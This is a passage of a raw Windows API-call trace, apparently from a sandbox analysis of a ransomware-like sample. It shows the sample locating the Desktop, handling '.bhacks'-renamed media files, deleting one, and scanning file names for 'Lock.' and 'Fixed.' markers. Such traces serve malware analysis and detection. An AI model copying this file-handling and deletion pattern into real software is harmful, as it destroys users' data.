lpMultiByteStr=0x29f6e80, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0102.316] CryptReleaseContext (hProv=0x9be890, dwFlags=0x0) returned 1 [0102.316] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0102.316] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0102.317] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0102.317] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0102.317] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0102.317] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0102.317] FreeLibrary (hLibModule=0x76390000) returned 1 [0102.317] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0102.317] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0102.317] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0102.317] CloseHandle (hObject=0x458) returned 1 [0102.318] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0102.318] CloseHandle (hObject=0x44c) returned 1 [0102.515] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0102.515] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0102.515] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0102.515] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf438 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0102.515] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0102.515] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6760 [0102.516] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0102.516] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0102.516] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0102.516] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0102.516] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0102.516] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0102.516] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0102.516] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0102.516] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0102.516] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0102.516] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0102.516] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0102.516] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6e80 [0102.516] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0102.516] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a75588 [0102.516] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6760 | out: hHeap=0x2af0000) returned 1 [0102.516] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0102.516] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0102.516] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0102.516] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0102.516] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0102.516] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6e80 | out: hHeap=0x2af0000) returned 1 [0102.516] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0102.516] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0102.516] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x50) returned 0x29eaa80 [0102.516] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/Kz5g.mp4.bhacks", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\Kz5g.mp4.bhacks", lpFilePart=0x8cedf4*="Kz5g.mp4.bhacks") returned 0x27 [0102.516] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eaa80 | out: hHeap=0x2af0000) returned 1 [0102.517] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\Kz5g.mp4.bhacks" (normalized: "c:\\users\\fd1hvy\\desktop\\kz5g.mp4.bhacks")) returned 0x20 [0102.517] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\Kz5g.mp4.bhacks", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25257692, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x25257692, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x25362701, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x4550, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Kz5g.mp4.bhacks", cAlternateFileName="KZ5GMP~1.BHA")) returned 0x9a3b80 [0102.517] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\Kz5g.mp4.bhacks" (normalized: "c:\\users\\fd1hvy\\desktop\\kz5g.mp4.bhacks")) returned 1 [0102.565] FindNextFileW (in: hFindFile=0x9a3b80, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25257692, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x25257692, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x25362701, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x4550, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Kz5g.mp4.bhacks", cAlternateFileName="KZ5GMP~1.BHA")) returned 0 [0102.566] FindClose (in: hFindFile=0x9a3b80 | out: hFindFile=0x9a3b80) returned 1 [0102.566] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75588 | out: hHeap=0x2af0000) returned 1 [0102.566] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0102.566] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0102.566] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0102.566] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0102.566] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0102.566] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0102.566] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0102.566] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0102.566] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0102.566] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0102.566] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0102.566] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0102.566] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0102.566] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0102.566] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0102.566] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0102.566] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0102.566] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0102.566] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9208 [0102.566] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0102.567] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0102.567] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9298 [0102.567] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0102.567] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf438 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0102.567] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0102.567] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa63e0 [0102.567] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0102.567] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0102.567] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0102.567] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0102.567] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0102.567] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0102.567] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0102.567] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0102.567] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0102.567] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0102.567] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0102.567] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0102.567] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ea0 [0102.567] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0102.567] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a75f60 [0102.567] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa63e0 | out: hHeap=0x2af0000) returned 1 [0102.567] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0102.567] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0102.567] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0102.567] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0102.567] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0102.567] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ea0 | out: hHeap=0x2af0000) returned 1 [0102.568] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0102.568] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0102.568] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0102.568] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0102.568] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0102.568] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0102.568] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0102.568] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0102.568] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0102.568] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0102.568] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0102.568] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0102.568] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0102.568] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x50) returned 0x29ead40 [0102.568] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/Kz5g.mp4.bhacks", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\Kz5g.mp4.bhacks", lpFilePart=0x8cf650*="Kz5g.mp4.bhacks") returned 0x27 [0102.568] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ead40 | out: hHeap=0x2af0000) returned 1 [0102.568] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\Kz5g.mp4.bhacks" (normalized: "c:\\users\\fd1hvy\\desktop\\kz5g.mp4.bhacks")) returned 0xffffffff [0102.568] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75f60 | out: hHeap=0x2af0000) returned 1 [0102.568] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0102.568] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0102.568] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0102.568] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0102.568] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0102.568] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0102.568] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0102.568] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0102.568] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0102.568] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0102.568] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0102.569] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0102.569] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0102.569] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0102.569] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0102.569] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0102.569] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0102.569] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0102.569] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0102.569] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0102.569] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0102.569] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0102.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mCQMPnOOyUYP.gif.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0102.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CQMPnOOyUYP.gif.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0102.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QMPnOOyUYP.gif.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0102.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MPnOOyUYP.gif.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0102.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PnOOyUYP.gif.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0102.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nOOyUYP.gif.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0102.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OOyUYP.gif.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0102.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OyUYP.gif.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0102.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yUYP.gif.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0102.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UYP.gif.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0102.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YP.gif.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0102.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="P.gif.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0102.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gif.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0102.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gif.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0102.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="if.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0102.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0102.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0102.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0102.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0102.569] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0102.569] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0102.570] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0102.570] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0102.570] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0102.570] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0102.570] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0102.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0102.570] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0102.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0102.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0102.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0102.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0102.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0102.570] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0102.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0102.570] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0102.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0102.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0102.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0102.570] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0102.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0102.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0102.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0102.570] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0102.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0102.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0102.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6728 [0102.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0102.570] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mCQMPnOOyUYP.gif.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0102.570] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CQMPnOOyUYP.gif.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0102.570] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QMPnOOyUYP.gif.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0102.571] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MPnOOyUYP.gif.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0102.571] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PnOOyUYP.gif.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0102.571] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nOOyUYP.gif.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0102.571] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OOyUYP.gif.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0102.571] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OyUYP.gif.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0102.571] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yUYP.gif.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0102.571] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UYP.gif.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0102.571] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YP.gif.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0102.571] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="P.gif.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0102.571] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gif.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0102.571] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gif.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 